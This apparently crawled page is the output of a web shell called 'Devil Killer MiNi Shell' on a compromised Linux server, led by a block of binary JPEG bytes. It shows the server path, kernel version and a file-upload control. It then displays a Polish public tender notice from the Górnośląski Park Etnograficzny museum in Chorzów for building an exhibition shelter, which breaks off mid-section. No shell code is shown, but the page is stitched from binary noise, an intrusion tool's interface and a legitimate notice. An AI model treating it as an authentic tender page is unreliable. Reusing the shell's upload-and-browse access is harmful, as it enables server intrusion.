JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20250825/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20250825/0038951501-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Budowa wiaty ekspozycyjnej na terenie Muzeum „Górnośląski Park Etnograficzny w Chorzowie”, w ramach projektu „Skarbiec Dziedzictwa” . </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Muzeum &#34;Górnośląski Park Etnograficzny w Chorzowie&#34;</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000278623</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Parkowa 25</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Chorzów</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">41-500</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">śląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL22A - Katowicki</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">+48 32 241 07 18</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">przetargi@muzeumgpe-chorzow.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.muzeumgpe-chorzow.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - państwowe i samorządowe instytucje kultury</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Rekreacja, kultura i religia</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Budowa wiaty ekspozycyjnej na terenie Muzeum „Górnośląski Park Etnograficzny w Chorzowie”, w ramach projektu „Skarbiec Dziedzictwa” . </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-aad2e2f0-4833-445e-83c6-f6dac1d9cf1d</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00389515</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-08-25</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00033084/05/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.3 Budowa wiaty ekspozycyjnej na terenie Muzeum „Górnośląski Park Etnograficzny w Chorzowie”, w ramach projektu „Skarbiec Dziedzictwa”</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> Projekt &#34;Skarbiec Dziedzictwa&#34; jest współfinansowany ze środków Europejskiego Funduszu Rozwoju Regionalnego w ramach programu regionalnego Fundusze Europejskie dla Śląskiego 2021-2027. Okres realizacji projektu od dnia 01.08.2023 r., do dnia 30.11.2026r. Wartość projektu stanowi kwotę: 42 073 600,00zł, w tym dofinansowanie w wysokości: 29 304 600,00zł. </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-aad2e2f0-4833-445e-83c6-f6dac1d9cf1d <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://ezamowienia.gov.pl/pl/</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. W postepowaniu o udzielenie zamówienia komunikacja między Zamawiającym a Wykonawcami odbywa się przy użyciu Platformy e-Zamówienia, która jest dostępna pod adresem: https://ezamowienia.gov.pl (komunikacja wymaga zarejestrowania się na Platformie e-Zamówienia <br/>i jest dostępna bezpłatnie dla każdego zalogowanego użytkownika Platformy) – dalej także jako Platforma lub Platforma e-Zamówienia.<br/>2. Korzystanie z Platformy e-Zamówienia jest bezpłatne.<br/>3. Zamawiający wyznacza następująca osobę do kontaktu z Wykonawcami w sprawach dotyczących niniejszego postepowania:<br/>1) Barbara Klajmon,<br/>2) Michał Strug.<br/>4. Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego, musi posiadać konto podmiotu „Wykonawca” na Platformie e-Zamówienia. Szczegółowe informacje na temat zakładania kont podmiotów oraz zasady i warunki korzystania z Platformy e-Zamówienia określa Regulamin Platformy e-Zamówienia, dostępny na stronie internetowej https://ezamowienia.gov.pl oraz informacje zamieszczone w zakładce „Centrum Pomocy”.<br/>5. Komunikacja w postępowaniu, z wyłączeniem składania ofert, odbywa się drogą elektroniczną za pośrednictwem formularzy do komunikacji dostępnych w zakładce „Formularze: („Formularze do komunikacji”). Za pośrednictwem „Formularzy do komunikacji” odbywa się w szczególności przekazywanie wezwań i zawiadomień, zadawanie pytań i udzielanie odpowiedzi. Formularze do komunikacji umożliwiają również dołączenie załącznika do przesyłanej wiadomości (przycisk „dodaj załącznik”).<br/>6. Załączniki, które, zgodnie z Ustawą Pzp lub rozporządzeniem Prezesa Rady Ministrów w sprawie wymagań dla dokumentów elektronicznych, są opatrzone kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym, mogą być opatrzone, zgodnie z wyborem Wykonawcy/Wykonawcy wspólnie ubiegającego się o udzielenie zamówienia/ podmiotu udostępniającego zasoby, podpisem zewnętrznym lub wewnętrznym. W zależności od rodzaju podpisu i jego typu ( zewnętrzny, wewnętrzny) dodaje się do przesyłanej wiadomości uprzednio podpisane dokumenty wraz wygenerowanym plikiem podpisu (typ zewnętrzny) lub dokument z wszytym podpisem (typ wewnętrzny).<br/>7. W przypadku problemów technicznych i awarii związanych z funkcjonowaniem Platformy e-Zamówienia użytkownicy mogą skorzystać ze wsparcia technicznego dostępnego pod numerem telefony 22 458 77 99 lub poprzez formularz udostępniony na stronie internetowej: https://ezamowienia.gov.pl, w zakładce „Zgłoś problem”.<br/>8. W szczególnie uzasadnionych przypadkach uniemożliwiających komunikację Wykonawcy i Zamawiającego za pośrednictwem Platformy e-Zamówienia, Zamawiający dopuszcza komunikację za pomocą poczty elektronicznej na adres e-mail: przetargi@muzeumgpe-chorzow.pl (nie dotyczy składania ofert w postępowaniu).<br/>9. Zamawiający nie przewiduje sposobu komunikowania się z Wykonawcami w inny sposób, niż przy użyciu środków komunikacji elektronicznej, wskazanych w niniejszym rozdziale SWZ.<br/>10. We wszelkiej korespondencji kierowanej do zamawiającego, Wykonawca winien posługiwać się numerem ogłoszenia BZP oraz nr sprawy: DOZ.331.9.2025<br/>11. Sposób sporządzenia dokumentów elektronicznych musi być zgodny z wymaganiami określonymi w rozporządzeniu Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie oraz rozporządzeniu Ministra Rozwoju, Pracy i Technologii z dnia 23 grudnia 2020 r. w sprawie podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń, jakich może żądać Zamawiający od Wykonawcy.<br/>12. W przypadku rozbieżności pomiędzy treścią niniejszej SWZ, a treścią udzielonych odpowiedzi jako obowiązującą należy przyjąć treść pisma zawierającego późniejsze oświadczenia Zamawiającego.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, informuje się, że:<br/>1. Administratorem danych osobowych Wykonawcy oraz osób dokonujących w imieniu Wykonawcy czynności w ramach postępowania o udzielenie zamówienia publicznego oraz jego realizacji jest Muzeum „Górnośląski Park Etnograficzny w Chorzowie” (dalej: Zamawiający), ul. Parkowa 25, <br/>41-500 Chorzów, telefon: 32 2410718, adres poczty elektronicznej: sekretariat@muzeumgpe-chorzow.pl. <br/>2. Administrator powołał inspektora ochrony danych, z którym można skontaktować się w sprawach związanych z danymi również pod adresem poczty elektronicznej: iod@muzeumgpe-chorzow.pl <br/>3. Podanie danych osobowych jest dobrowolne, ale niezbędne do udziału w postępowaniu o udzielenie zamówienia, zawarcia i wykonania umowy. Jeżeli Wykonawca nie poda danych osobowych, to niemożliwym będzie wybór oferty, zawarcie i wykonanie umowy, a w szczególności wypłata wynagrodzenia.<br/>4. Podstawą prawną przetwarzania danych osobowych jest art. 6 ust. 1 lit. b), c) oraz f) Rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 roku w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE („RODO”). <br/>5. Dane osobowe Wykonawcy oraz osób dokonujących w imieniu Wykonawcy czynności w ramach postępowania o udzielenie zamówienia publicznego oraz jego realizacji przetwarzane są w celu przeprowadzenia postępowania o udzielenia zamówienia publicznego, zawarcia i wykonania umowy, w celu wypełnienia obowiązków prawnych ciążących na administratorze takich jak przetwarzanie danych związane z prowadzeniem ksiąg rachunkowych, sprawozdawczością podatkową, archiwizacją oraz w celach wynikających z prawnie uzasadnionych interesów realizowanych przez administratora <br/>w postaci dochodzenia roszczeń wynikających z umowy oraz obrony przed takimi roszczeniami. <br/>6. Zamawiający może udostępnić dane osobowe, jeśli będzie to konieczne do należytego wykonania umowy, praw i obowiązków Zamawiającego lub wynikać będzie z przepisów prawa. Dane mogą być przekazane podmiotom upoważnionym przez Zamawiającego lub innym odbiorcom danych, takim jak: bank, kancelaria prawna, kurier, poczta.<br/>7. Zamawiający nie zamierza przekazywać danych do podmiotu trzeciego, organizacji międzynarodowej, nie będzie przetwarzał ich w sposób zautomatyzowany, w tym nie będzie dokonywał tzw. profilowania. <br/>8. Dane osobowe będą przechowywane przez okres niezbędny do realizacji umowy oraz wynikający z przepisów prawa, w szczególności finansowo-księgowych oraz archiwalnych: <br/>a) w celu prowadzenia postępowania o udzielenie zamówienia publicznego do czasu zawarcia umowy,<br/>b) w celu zawarcia i wykonania umowy, do czasu kiedy umowa obowiązuje i upływu terminów przedawnienia roszczeń z niej wynikających,<br/>c) w celu wypełnienia obowiązków prawnych ciążących na administratorze, do czasu wygaśnięcia tych obowiązków,<br/>d) w celach wynikających z prawnie uzasadnionych interesów realizowanych przez administratora, do czasu ustania prawnej możliwości ich realizacji. <br/>9. Osoba, której dane są przetwarzane przez Zamawiającego, ma prawo: dostępu do swoich danych, ich sprostowania, żądania ich usunięcia, ograniczenia przetwarzania, do wniesienia sprzeciwu, żądania zaprzestania przetwarzania oraz prawo przenoszenia danych.<br/>10. Osoba, której dane są przetwarzane przez Zamawiającego, ma prawo wniesienia skargi do organu nadzorczego.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">DOZ.331.9.2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem zamówienia jest budowa wiaty ekspozycyjnej na terenie Muzeum „Górnośląski Park Etnograficzny w Chorzowie”, w ramach projektu „Skarbiec Dziedzictwa”, przy ul. Parkowej 25.<br/>2. Szczegółowy zakres przedmiotu zamówienia obejmuje Specyfikacja Warunków Zamówienia (dalej: SWZ), a także dokumentacja techniczna stanowiąca załącznik nr 1 do SWZ, na którą składa się:<br/>a) część opisowa, <br/>b) część rysunkowa,<br/>c) STWiOR,<br/>d) przedmiar robót.<br/>3. Rozwiązania równoważne:<br/>W przypadku, gdy w dokumentacji projektowej lub specyfikacji technicznej wykonania i odbioru robót został wskazany znak towarowy (marka), producent, dostawca, patent, pochodzenie, źródło lub szczegółowy proces, który charakteryzuje produkty lub usługi dostarczone przez konkretnego wykonawcę, oznacza to, że są podane przykładowo i określają jedynie minimalne oczekiwane parametry jakościowe oraz wymagany standard. Wykonawca może zastosować materiały lub urządzenia równoważne, o których mowa w art. 101 ust. 1 pkt 2) oraz 3) ustawy Pzp, w stosunku do wskazanych w dokumentacji projektowej oraz STWiORB pod warunkiem, że zapewnią uzyskanie parametrów technicznych nie gorszych od założonych w dokumentacji projektowej i STWiORB oraz będą zgodne pod względem: gabarytów i konstrukcji (wielkość, rodzaj, właściwości fizyczne, liczba elementów składowych), charakteru użytkowego (tożsamość funkcji), charakterystyki materiałowej (rodzaj i jakość materiałów), parametrów technicznych (wytrzymałość, trwałość, dane techniczne, dane hydrauliczne, charakterystyki liniowe, konstrukcja), parametrów bezpieczeństwa użytkowania, standardów emisyjnych. <br/>4. Przedmiotowe zamówienie jest współfinansowane w ramach Programu Fundusze Europejskie. <br/>Informacja o projekcie:<br/>Robota budowlana stanowiąca przedmiot zamówienia świadczona będzie na rzecz projektu „Skarbiec Dziedzictwa”, którego realizatorem jest Muzeum „Górnośląski Park Etnograficzny w Chorzowie”, ul. Parkowa 25, 41-500 Chorzów. Projekt &#34;Skarbiec Dziedzictwa&#34; jest współfinansowany ze środków Europejskiego Funduszu Rozwoju Regionalnego w ramach programu regionalnego Fundusze Europejskie dla Śląskiego 2021-2027. Okres realizacji projektu od dnia 01.08.2023 r., do dnia 30.11.2026r. Wartość projektu stanowi kwotę: 42 073 600,00zł, w tym dofinansowanie w wysokości: 29 304 600,00zł. Projekt „Skarbiec Dziedzictwa” w dalszej części zwany może być także „Projektem”. Głównym celem realizacji Projektu jest podniesienie jakości i dostępności usług kulturalnych poprzez wdrożenie działań związanych z ochroną i zachowaniem dziedzictwa kulturowego, rozwój samego Muzeum „Górnośląski Park Etnograficzny w Chorzowie” oraz zwiększenie uczestnictwa w kulturze na poziomie lokalnym i regionalnym. Dodatkowo, Projekt zakłada budowę obiektu, który stanie się nowoczesnym centrum edukacyjno-kulturalnym, a także modernizację kompleksu młyńskiego, przyczyniając się również do poprawy bezpieczeństwa na modernizowanym obszarze. Prace adaptacyjne Projektu umożliwią wprowadzenie nowego programu wystawienniczego, kulturalnego <br/>i edukacyjnego, szczególnie z uwzględnieniem potrzeb grup zagrożonych wykluczeniem społecznym, takich jak osoby z niepełnosprawnościami, osoby starsze, osoby ubogie, czy uchodźcy. Projekt będzie realizowany na obszarze Muzeum &#34;Górnośląski Park Etnograficzny w Chorzowie&#34;, usytuowanego przy ul. Parkowej 25 na terenie Parku Śląskiego, na którego zakres składa się: <br/>1) modernizacja systemu wodnego młyna,<br/>2) budowa budynku wielofunkcyjnego wraz z infrastrukturą towarzyszącą, <br/>3) zakup niezbędnego wyposażenia dla nowopowstałego budynku wielofunkcyjnego. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45200000-9 - Roboty budowlane w zakresie wznoszenia kompletnych obiektów budowlanych lub ich części oraz roboty w zakresie inżynierii lądowej i wodnej</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45100000-8 - Przygotowanie terenu pod budowę</p> <p class="mb-0">45111230-9 - Roboty w zakresie stabilizacji gruntu</p> <p class="mb-0">45111291-4 - Roboty w zakresie zagospodarowania terenu</p> <p class="mb-0">45112500-0 - Usuwanie gleby</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">60 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Przy wyborze najkorzystniejszej oferty Zamawiający będzie się kierował następującymi kryteriami oceny ofert:<br/>1.	Cena (C)	60% (60% = 60,00 pkt)<br/>2.	Okres gwarancji jakości (G)	40% (40% = 40,00 pkt)<br/>* wg zasady 1% = 1 pkt<br/>2. Liczbę punktów (P), jaka zostanie przyznana ofercie, stanowi obliczona z dokładnością do dwóch miejsc po przecinku suma punktów uzyskanych w każdym kryterium oceny ofert: P = C + G, gdzie:<br/>P – liczba punktów przyznana ocenianej ofercie łącznie za kryterium „Cena” i „Okres gwarancji jakości”,<br/>C – liczba punktów za kryterium „Cena” przyznana ocenianej ofercie,<br/>G – liczba punktów za kryterium „Okres gwarancji jakości” przyznana ocenianej ofercie.<br/>3. Za najkorzystniejszą ofertę uznana zostanie oferta, która uzyskała największą liczbę punktów (P).<br/>4. Liczba punktów za kryterium:<br/>a) „Cena” – zostanie obliczona z dokładnością do dwóch miejsc po przecinku, w następujący sposób: C= /Cmin : Cbad/ x 60,00<br/>gdzie:<br/>C – liczba punktów za kryterium „Cena” przyznana ocenianej ofercie,<br/>Cmin – najniższa cena ofertowa spośród ocenianych ofert,<br/>Cbad – cena ofertowa oferty ocenianej.<br/>Maksymalna liczba punktów, jakie może otrzymać oferta w pierwszym kryterium oceny ofert wynosi 60,00 pkt.<br/>b) „Okres gwarancji jakości” - zostanie obliczona w następujący sposób: <br/>G = / Gbad : Gmax / x 40<br/>gdzie:<br/>G – liczba punktów za kryterium „Okres gwarancji” przyznana ocenianej ofercie,<br/>Gbad - okres gwarancji oferty ocenianej,<br/>Gmax – najdłuższy zaoferowany okres gwarancji spośród ocenianych ofert /max 60 miesięcy/.<br/>Uwaga! Zaoferowany przez Wykonawców okres gwarancji jakości nie może być krótszy niż 36 miesięcy. W przypadku krótszego okresu gwarancji zaoferowanego przez Wykonawcę oferta będzie podlegała odrzuceniu na podstawie art. 226 ust. 1 pkt 5 ustawy Pzp.<br/>Maksymalny okres gwarancji powinien wynieść nie więcej niż 60 miesięcy. W przypadku zaoferowania przez Wykonawcę okresu dłuższego, Wykonawca otrzyma liczbę punktów przypadającą za okres 60 miesięcy, ale będzie związany okresem gwarancji zaoferowanym w „Formularzu oferty”.<br/>Uwaga: Jeżeli zostanie złożona oferta, której wybór prowadziłby do powstania u Zamawiającego obowiązku podatkowego zgodnie z ustawą z dnia 11 marca 2004 r. o podatku od towarów i usług (Dz.U.2025.896), dla celów zastosowania kryterium ceny Zamawiający dolicza do przedstawionej w tej ofercie ceny kwotę podatku od towarów i usług, którą miałby obowiązek rozliczyć.<br/>Uwaga: Przy obliczaniu punktów, Zamawiający zastosuje zaokrąglenie do dwóch miejsc po przecinku według zasady, że trzecia cyfra po przecinku od 5 w górę powoduje zaokrąglenie drugiej cyfry po przecinku w górę o 1. Jeśli trzecia cyfra po przecinku jest mniejsza niż 5, to druga cyfra po przecinku nie ulega zmianie.<br/>3. Za ofertę najkorzystniejszą będzie uznana oferta, która przy uwzględnieniu powyższych kryteriów i ich wagi otrzyma najwyższą punktację – 100,00 pkt.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">G -wydłużenie terminu gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 